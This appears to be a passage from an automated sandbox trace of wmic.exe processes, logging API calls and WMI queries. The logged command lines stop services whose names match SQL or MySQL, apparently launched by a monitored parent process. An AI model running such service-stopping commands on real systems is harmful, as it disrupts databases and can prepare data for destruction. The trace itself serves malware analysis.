ppInSignature=0x87da6c*=0x2b70578, ppOutSignature=0x87da68*=0x2b73030) returned 0x0 [0285.566] lstrlenW (lpString="UserControlService") returned 18 [0285.566] lstrlenW (lpString="stopservice") returned 11 [0285.566] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0285.566] IUnknown:Release (This=0x2b70578) returned 0x0 [0285.566] IUnknown:Release (This=0x2b73030) returned 0x0 [0285.566] IWbemClassObject:NextMethod (in: This=0x2b70380, lFlags=0, pstrName=0x87da70*=0x0, ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x0 | out: pstrName=0x87da70*="Create", ppInSignature=0x87da6c*=0x2b70578, ppOutSignature=0x87da68*=0x2b75000) returned 0x0 [0285.567] lstrlenW (lpString="Create") returned 6 [0285.567] lstrlenW (lpString="stopservice") returned 11 [0285.567] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0285.567] IUnknown:Release (This=0x2b70578) returned 0x0 [0285.567] IUnknown:Release (This=0x2b75000) returned 0x0 [0285.567] IWbemClassObject:NextMethod (in: This=0x2b70380, lFlags=0, pstrName=0x87da70*=0x0, ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x0 | out: pstrName=0x87da70*="Change", ppInSignature=0x87da6c*=0x2b70578, ppOutSignature=0x87da68*=0x2b74d80) returned 0x0 [0285.567] lstrlenW (lpString="Change") returned 6 [0285.567] lstrlenW (lpString="stopservice") returned 11 [0285.567] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0285.567] IUnknown:Release (This=0x2b70578) returned 0x0 [0285.567] IUnknown:Release (This=0x2b74d80) returned 0x0 [0285.567] IWbemClassObject:NextMethod (in: This=0x2b70380, lFlags=0, pstrName=0x87da70*=0x0, ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x0 | out: pstrName=0x87da70*="ChangeStartMode", ppInSignature=0x87da6c*=0x2b70578, ppOutSignature=0x87da68*=0x2b73030) returned 0x0 [0285.567] lstrlenW (lpString="ChangeStartMode") returned 15 [0285.567] lstrlenW (lpString="stopservice") returned 11 [0285.567] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0285.568] IUnknown:Release (This=0x2b70578) returned 0x0 [0285.568] IUnknown:Release (This=0x2b73030) returned 0x0 [0285.568] IWbemClassObject:NextMethod (in: This=0x2b70380, lFlags=0, pstrName=0x87da70*=0x0, ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x0 | out: pstrName=0x87da70*="Delete", ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x2b46c80) returned 0x0 [0285.568] lstrlenW (lpString="Delete") returned 6 [0285.568] lstrlenW (lpString="stopservice") returned 11 [0285.568] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0285.568] IUnknown:Release (This=0x2b46c80) returned 0x0 [0285.568] IWbemClassObject:NextMethod (in: This=0x2b70380, lFlags=0, pstrName=0x87da70*=0x0, ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x0 | out: pstrName=0x87da70*="GetSecurityDescriptor", ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x2b70578) returned 0x0 [0285.568] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0285.568] lstrlenW (lpString="stopservice") returned 11 [0285.568] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0285.568] IUnknown:Release (This=0x2b70578) returned 0x0 [0285.568] IWbemClassObject:NextMethod (in: This=0x2b70380, lFlags=0, pstrName=0x87da70*=0x0, ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x0 | out: pstrName=0x87da70*="SetSecurityDescriptor", ppInSignature=0x87da6c*=0x2b70578, ppOutSignature=0x87da68*=0x2b73030) returned 0x0 [0285.568] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0285.568] lstrlenW (lpString="stopservice") returned 11 [0285.568] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0285.568] IUnknown:Release (This=0x2b70578) returned 0x0 [0285.568] IUnknown:Release (This=0x2b73030) returned 0x0 [0285.569] IWbemClassObject:NextMethod (in: This=0x2b70380, lFlags=0, pstrName=0x87da70*=0x0, ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x0 | out: pstrName=0x87da70*=0x0, ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x0) returned 0x40005 [0285.569] IUnknown:Release (This=0x2b70380) returned 0x0 [0285.570] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0285.570] lstrlenW (lpString="SET") returned 3 [0285.570] lstrlenW (lpString="call") returned 4 [0285.570] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0285.570] lstrlenW (lpString="CREATE") returned 6 [0285.570] lstrlenW (lpString="call") returned 4 [0285.570] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0285.570] free (_Block=0x2da2a10) [0285.570] malloc (_Size=0x4) returned 0x2dac108 [0285.570] lstrlenW (lpString="GET") returned 3 [0285.570] lstrlenW (lpString="call") returned 4 [0285.570] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0285.570] lstrlenW (lpString="LIST") returned 4 [0285.570] lstrlenW (lpString="call") returned 4 [0285.571] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0285.571] lstrlenW (lpString="ASSOC") returned 5 [0285.571] lstrlenW (lpString="call") returned 4 [0285.571] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0285.571] WbemLocator:IUnknown:AddRef (This=0x2b147f8) returned 0x3 [0285.571] free (_Block=0x2da2788) [0285.571] lstrlenW (lpString="") returned 0 [0285.571] lstrlenW (lpString="NQDPDE") returned 6 [0285.571] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0285.571] lstrlenW (lpString="NQDPDE") returned 6 [0285.571] malloc (_Size=0xe) returned 0x2daae58 [0285.571] lstrlenW (lpString="NQDPDE") returned 6 [0285.571] GetCurrentThreadId () returned 0x4e4 [0285.571] GetCurrentProcess () returned 0xffffffff [0285.571] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x87fb48 | out: TokenHandle=0x87fb48*=0x2f8) returned 1 [0285.571] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x87fb44 | out: TokenInformation=0x0, ReturnLength=0x87fb44) returned 0 [0285.571] malloc (_Size=0x118) returned 0x2dac8f0 [0285.571] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x2dac8f0, TokenInformationLength=0x118, ReturnLength=0x87fb44 | out: TokenInformation=0x2dac8f0, ReturnLength=0x87fb44) returned 1 [0285.571] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x2dac8f0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0285.571] free (_Block=0x2dac8f0) [0285.571] CloseHandle (hObject=0x2f8) returned 1 [0285.571] lstrlenW (lpString="GET") returned 3 [0285.572] lstrlenW (lpString="call") returned 4 [0285.572] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0285.572] lstrlenW (lpString="LIST") returned 4 [0285.572] lstrlenW (lpString="call") returned 4 [0285.572] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0285.572] lstrlenW (lpString="SET") returned 3 [0285.572] lstrlenW (lpString="call") returned 4 [0285.572] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0285.572] lstrlenW (lpString="CALL") returned 4 [0285.572] lstrlenW (lpString="call") returned 4 [0285.572] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0285.572] ??0CHString@@QAE@XZ () returned 0x87fb08 [0285.572] GetCurrentThreadId () returned 0x4e4 [0285.572] malloc (_Size=0xc) returned 0x2daaea0 [0285.572] malloc (_Size=0xc) returned 0x2daaed0 [0285.572] malloc (_Size=0xc) returned 0x2daae70 [0285.572] malloc (_Size=0xc) returned 0x2daaeb8 [0285.572] malloc (_Size=0xc) returned 0x2da9928 [0285.572] SysStringLen (param_1="\\\\") returned 0x2 [0285.572] SysStringLen (param_1="NQDPDE") returned 0x6 [0285.573] malloc (_Size=0xc) returned 0x2dace78 [0285.573] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0285.573] SysStringLen (param_1="\\") returned 0x1 [0285.573] malloc (_Size=0xc) returned 0x2dacc68 [0285.573] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0285.573] SysStringLen (param_1="root\\cimv2") returned 0xa [0285.573] free (_Block=0x2dace78) [0285.573] free (_Block=0x2da9928) [0285.573] free (_Block=0x2daaeb8) [0285.573] free (_Block=0x2daae70) [0285.573] free (_Block=0x2daaed0) [0285.573] free (_Block=0x2daaea0) [0285.573] malloc (_Size=0xc) returned 0x2dacce0 [0285.573] malloc (_Size=0xc) returned 0x2dacea8 [0285.573] malloc (_Size=0xc) returned 0x2dacdb8 [0285.574] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2b147f8, strNetworkResource="\\\\NQDPDE\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68564 | out: ppNamespace=0xa68564*=0x2b70cd8) returned 0x0 [0285.584] free (_Block=0x2dacdb8) [0285.584] free (_Block=0x2dacea8) [0285.584] free (_Block=0x2dacce0) [0285.584] CoSetProxyBlanket (pProxy=0x2b70cd8, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0285.585] free (_Block=0x2dacc68) [0285.585] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0285.585] ??0CHString@@QAE@XZ () returned 0x87fb00 [0285.585] GetCurrentThreadId () returned 0x4e4 [0285.585] malloc (_Size=0x38) returned 0x2dac8f0 [0285.585] malloc (_Size=0x28) returned 0x2dac930 [0285.585] malloc (_Size=0x28) returned 0x2dac960 [0285.585] malloc (_Size=0x38) returned 0x2dac990 [0285.585] malloc (_Size=0x38) returned 0x2dac9d0 [0285.585] malloc (_Size=0x24) returned 0x2daca10 [0285.585] malloc (_Size=0xc) returned 0x2daaea0 [0285.585] lstrlenA (lpString="") returned 0 [0285.585] malloc (_Size=0x2) returned 0x2da2788 [0285.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x2da2788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0285.585] free (_Block=0x2da2788) [0285.585] malloc (_Size=0x38) returned 0x2daca40 [0285.585] malloc (_Size=0x24) returned 0x2daca80 [0285.585] malloc (_Size=0xc) returned 0x2daae70 [0285.586] free (_Block=0x2daaea0) [0285.586] IWbemServices:GetObject (in: This=0x2b70cd8, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x87fad8*=0x0, ppCallResult=0x0 | out: ppObject=0x87fad8*=0x2b70380, ppCallResult=0x0) returned 0x0 [0285.649] malloc (_Size=0xc) returned 0x2daaea0 [0285.649] IWbemClassObject:GetMethod (in: This=0x2b70380, wszName="stopservice", lFlags=0, ppInSignature=0x87faf4, ppOutSignature=0x87fad4 | out: ppInSignature=0x87faf4*=0x0, ppOutSignature=0x87fad4*=0x2b70578) returned 0x0 [0285.650] free (_Block=0x2daaea0) [0285.650] IUnknown:Release (This=0x2b70578) returned 0x0 [0285.650] IUnknown:Release (This=0x2b70380) returned 0x0 [0285.652] ??0CHString@@QAE@XZ () returned 0x87f9b8 [0285.652] GetCurrentThreadId () returned 0x4e4 [0285.652] malloc (_Size=0xc) returned 0x2daaea0 [0285.652] lstrlenA (lpString="") returned 0 [0285.652] malloc (_Size=0x2) returned 0x2da2788 [0285.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x2da2788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0285.652] free (_Block=0x2da2788) [0285.652] malloc (_Size=0xc) returned 0x2daaed0 [0285.652] lstrlenA (lpString="") returned 0 [0285.652] malloc (_Size=0x2) returned 0x2da2788 [0285.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x2da2788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0285.652] free (_Block=0x2da2788) [0285.652] malloc (_Size=0xc) returned 0x2daaeb8 [0285.652] free (_Block=0x2daaed0) [0285.652] malloc (_Size=0xc) returned 0x2daaed0 [0285.652] lstrlenA (lpString="SELECT * FROM ") returned 14 [0285.652] malloc (_Size=0x1e) returned 0x2dacab0 [0285.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa24354, cbMultiByte=-1, lpWideCharStr=0x2dacab0, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0285.652] free (_Block=0x2dacab0) [0285.652] malloc (_Size=0xc) returned 0x2da9928 [0285.652] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0285.652] SysStringLen (param_1="Win32_Service") returned 0xd [0285.653] free (_Block=0x2daaed0) [0285.653] malloc (_Size=0xc) returned 0x2daaed0 [0285.653] malloc (_Size=0xc) returned 0x2dace30 [0285.653] lstrlenA (lpString=" WHERE ") returned 7 [0285.653] malloc (_Size=0x10) returned 0x2dace00 [0285.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa237a8, cbMultiByte=-1, lpWideCharStr=0x2dace00, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0285.653] free (_Block=0x2dace00) [0285.653] malloc (_Size=0xc) returned 0x2dacc68 [0285.653] SysStringLen (param_1=" WHERE ") returned 0x7 [0285.653] SysStringLen (param_1="name like '%%SQL%%'") returned 0x13 [0285.653] malloc (_Size=0xc) returned 0x2dacd28 [0285.653] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0285.653] SysStringLen (param_1=" WHERE name like '%%SQL%%'") returned 0x1a [0285.653] free (_Block=0x2da9928) [0285.653] free (_Block=0x2dacc68) [0285.653] free (_Block=0x2dace30) [0285.653] free (_Block=0x2daaed0) [0285.653] malloc (_Size=0xc) returned 0x2dacc80 [0285.654] IWbemServices:ExecQuery (in: This=0x2b70cd8, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%SQL%%'", lFlags=48, pCtx=0x0, ppEnum=0x87f9c4 | out: ppEnum=0x87f9c4*=0x2b74168) returned 0x0 [0285.668] free (_Block=0x2dacc80) [0285.668] CoSetProxyBlanket (pProxy=0x2b74168, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0285.688] IEnumWbemClassObject:Next (in: This=0x2b74168, lTimeout=-1, uCount=0x1, apObjects=0x87f9c0, puReturned=0x87f9b0 | out: apObjects=0x87f9c0*=0x0, puReturned=0x87f9b0*=0x0) returned 0x1 [0286.918] IUnknown:Release (This=0x2b74168) returned 0x0 [0286.921] free (_Block=0x2dacd28) [0286.921] free (_Block=0x2daaeb8) [0286.921] free (_Block=0x2daaea0) [0286.921] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0286.921] free (_Block=0x2daae70) [0286.921] free (_Block=0x2daca10) [0286.921] free (_Block=0x2dac9d0) [0286.921] free (_Block=0x2dac990) [0286.921] free (_Block=0x2dac960) [0286.921] free (_Block=0x2dac930) [0286.922] free (_Block=0x2daca80) [0286.922] free (_Block=0x2daca40) [0286.922] free (_Block=0x2dac8f0) [0286.922] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0286.922] GetCurrentThreadId () returned 0x4e4 [0286.922] ??0CHString@@QAE@PBG@Z () returned 0x87fb78 [0286.922] ??YCHString@@QAEABV0@PBG@Z () returned 0x87fb78 [0286.922] malloc (_Size=0x800) returned 0x2dacff8 [0286.922] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x2dacff8, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0286.922] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0286.922] malloc (_Size=0x1c) returned 0x2dac8f0 [0286.923] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x2dac8f0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0286.923] __iob_func () returned 0x776f2608 [0286.923] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 27 [0286.923] __iob_func () returned 0x776f2608 [0286.923] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0286.924] free (_Block=0x2dac8f0) [0286.924] free (_Block=0x2dacff8) [0286.924] ??1CHString@@QAE@XZ () returned 0x1 [0286.924] WbemLocator:IUnknown:Release (This=0x2b70cd8) returned 0x0 [0286.924] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0286.924] _kbhit () returned 0x0 [0286.927] free (_Block=0x2dac108) [0286.928] free (_Block=0x2daade0) [0286.928] free (_Block=0x2daadb0) [0286.928] free (_Block=0x2daacc0) [0286.928] free (_Block=0x2daad50) [0286.928] free (_Block=0x2dab048) [0286.928] free (_Block=0x2dac0e0) [0286.928] free (_Block=0x2da9da8) [0286.928] free (_Block=0x2dac150) [0286.928] free (_Block=0x2daacd8) [0286.928] free (_Block=0x2da2a30) [0286.928] free (_Block=0x2da0520) [0286.928] free (_Block=0x2dacbc0) [0286.928] free (_Block=0x2daab28) [0286.928] free (_Block=0x2daae10) [0286.928] free (_Block=0x2dacb80) [0286.928] free (_Block=0x2dacb40) [0286.928] free (_Block=0x2daae88) [0286.929] free (_Block=0x2daae40) [0286.929] free (_Block=0x2daae28) [0286.929] free (_Block=0x2dacb10) [0286.929] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0286.929] free (_Block=0x2dabcd0) [0286.929] free (_Block=0x2daad80) [0286.929] free (_Block=0x2da0568) [0286.929] free (_Block=0x2daad08) [0286.929] free (_Block=0x2dac118) [0286.929] free (_Block=0x2daad68) [0286.929] free (_Block=0x2da29f0) [0286.929] free (_Block=0x2da26b0) [0286.929] free (_Block=0x2da26f8) [0286.929] free (_Block=0x2da2740) [0286.929] free (_Block=0x2daae58) [0286.929] free (_Block=0x2da27c8) [0286.929] free (_Block=0x2da0508) [0286.929] free (_Block=0x2da2b10) [0286.929] free (_Block=0x2da04f0) [0286.930] free (_Block=0x2da2c90) [0286.930] free (_Block=0x2da04d8) [0286.930] free (_Block=0x2da2bf0) [0286.930] free (_Block=0x2da28f8) [0286.930] free (_Block=0x2da2910) [0286.930] free (_Block=0x2da28c0) [0286.930] free (_Block=0x2da28d8) [0286.930] free (_Block=0x2da2930) [0286.930] free (_Block=0x2da2948) [0286.930] free (_Block=0x2da04a0) [0286.930] free (_Block=0x2da04b8) [0286.930] free (_Block=0x2da2850) [0286.930] free (_Block=0x2da2868) [0286.930] free (_Block=0x2da2818) [0286.930] free (_Block=0x2da2830) [0286.930] free (_Block=0x2da2888) [0286.930] free (_Block=0x2da28a0) [0286.930] free (_Block=0x2da27e0) [0286.930] free (_Block=0x2da27f8) [0286.930] free (_Block=0x2da27a0) [0286.930] free (_Block=0x2da11f0) [0286.930] free (_Block=0x2daafc0) [0286.931] WbemLocator:IUnknown:Release (This=0x2b147f8) returned 0x2 [0286.931] WbemLocator:IUnknown:Release (This=0x2b1aa38) returned 0x0 [0286.931] WbemLocator:IUnknown:Release (This=0x2b147f8) returned 0x1 [0286.931] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0286.931] WbemLocator:IUnknown:Release (This=0x2b147f8) returned 0x0 [0286.931] free (_Block=0x2daab88) [0286.932] free (_Block=0x2daab58) [0286.932] free (_Block=0x2da2b70) [0286.932] free (_Block=0x2daac78) [0286.932] free (_Block=0x2daac90) [0286.932] free (_Block=0x2da2bb0) [0286.932] free (_Block=0x2daabb8) [0286.932] free (_Block=0x2daabe8) [0286.932] free (_Block=0x2da29b0) [0286.932] free (_Block=0x2daac18) [0286.932] free (_Block=0x2daadc8) [0286.932] free (_Block=0x2da2c30) [0286.932] free (_Block=0x2daaca8) [0286.932] free (_Block=0x2daac00) [0286.932] free (_Block=0x2da2b90) [0286.932] free (_Block=0x2daaba0) [0286.932] free (_Block=0x2daab10) [0286.932] free (_Block=0x2da2d30) [0286.932] free (_Block=0x2daacf0) [0286.933] free (_Block=0x2daab70) [0286.933] free (_Block=0x2da2cb0) [0286.933] free (_Block=0x2daad38) [0286.933] free (_Block=0x2daab40) [0286.933] free (_Block=0x2da2af0) [0286.933] free (_Block=0x2da9988) [0286.933] free (_Block=0x2daabd0) [0286.933] free (_Block=0x2da2a50) [0286.933] free (_Block=0x2daadf8) [0286.933] free (_Block=0x2daac30) [0286.933] free (_Block=0x2da2cd0) [0286.933] free (_Block=0x2daad20) [0286.933] free (_Block=0x2daac48) [0286.933] free (_Block=0x2da2990) [0286.933] free (_Block=0x2daad98) [0286.934] free (_Block=0x2daac60) [0286.934] free (_Block=0x2da2c70) [0286.934] free (_Block=0x2da9910) [0286.934] free (_Block=0x2da97f0) [0286.934] free (_Block=0x2da2ab0) [0286.934] free (_Block=0x2da99a0) [0286.934] free (_Block=0x2da99b8) [0286.934] free (_Block=0x2da2b30) [0286.934] free (_Block=0x2da9880) [0286.934] free (_Block=0x2da98f8) [0286.934] free (_Block=0x2da2d50) [0286.934] free (_Block=0x2da9808) [0286.935] free (_Block=0x2da98b0) [0286.935] free (_Block=0x2da2b50) [0286.935] free (_Block=0x2da9940) [0286.935] free (_Block=0x2da9970) [0286.935] free (_Block=0x2da2a70) [0286.935] free (_Block=0x2da9850) [0286.935] free (_Block=0x2da9898) [0286.935] free (_Block=0x2da2cf0) [0286.935] free (_Block=0x2da9838) [0286.935] free (_Block=0x2da9868) [0286.935] free (_Block=0x2da2bd0) [0286.935] free (_Block=0x2da98c8) [0286.935] free (_Block=0x2da98e0) [0286.935] free (_Block=0x2da2c10) [0286.935] free (_Block=0x2da9820) [0286.936] free (_Block=0x2da9958) [0286.936] free (_Block=0x2da2d10) [0286.936] CoUninitialize () [0286.987] exit (_Code=0) [0286.988] free (_Block=0x2daaee8) [0286.988] free (_Block=0x2da0ff8) [0286.988] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0286.988] free (_Block=0x2da2e00) [0286.988] free (_Block=0x2da1218) [0286.988] free (_Block=0x2da0fd8) [0286.988] free (_Block=0x2da0fb8) [0286.988] free (_Block=0x2da0f88) [0286.988] free (_Block=0x2da0f68) [0286.988] free (_Block=0x2da0f38) [0286.988] free (_Block=0x2da0ef8) [0286.988] free (_Block=0x2da0ed8) [0286.988] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0286.988] free (_Block=0x2da29d0) Thread: id = 252 os_tid = 0x13f0 Thread: id = 253 os_tid = 0x12bc Thread: id = 254 os_tid = 0x13f4 Thread: id = 255 os_tid = 0x1050 Process: id = "21" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x1f76e000" os_pid = "0x1284" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 257 os_tid = 0x11d8 [0287.484] GetModuleHandleA (lpModuleName=0x0) returned 0xa20000 [0287.484] __set_app_type (_Type=0x1) [0287.484] __p__fmode () returned 0x776f3c14 [0287.484] __p__commode () returned 0x776f49ec [0287.484] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa59af0) returned 0x0 [0287.484] __wgetmainargs (in: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0, _DoWildCard=0, _StartInfo=0xa681bc | out: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0) returned 0 [0287.488] ??0CHString@@QAE@XZ () returned 0xa685ec [0287.488] malloc (_Size=0x18) returned 0x410ee0 [0287.488] malloc (_Size=0x38) returned 0x410f00 [0287.488] malloc (_Size=0x28) returned 0x410f40 [0287.488] malloc (_Size=0x18) returned 0x410f70 [0287.488] malloc (_Size=0x24) returned 0x410f90 [0287.488] malloc (_Size=0x18) returned 0x410fc0 [0287.488] malloc (_Size=0x18) returned 0x410fe0 [0287.488] ??0CHString@@QAE@XZ () returned 0xa688fc [0287.488] malloc (_Size=0x18) returned 0x411000 [0287.488] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0287.488] SetConsoleCtrlHandler (HandlerRoutine=0xa53cc0, Add=1) returned 1 [0287.489] _onexit (_Func=0xa5f370) returned 0xa5f370 [0287.489] _onexit (_Func=0xa5f380) returned 0xa5f380 [0287.489] _onexit (_Func=0xa5f390) returned 0xa5f390 [0287.489] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0287.489] ResolveDelayLoadedAPI () returned 0x74a22590 [0287.490] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0287.495] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, 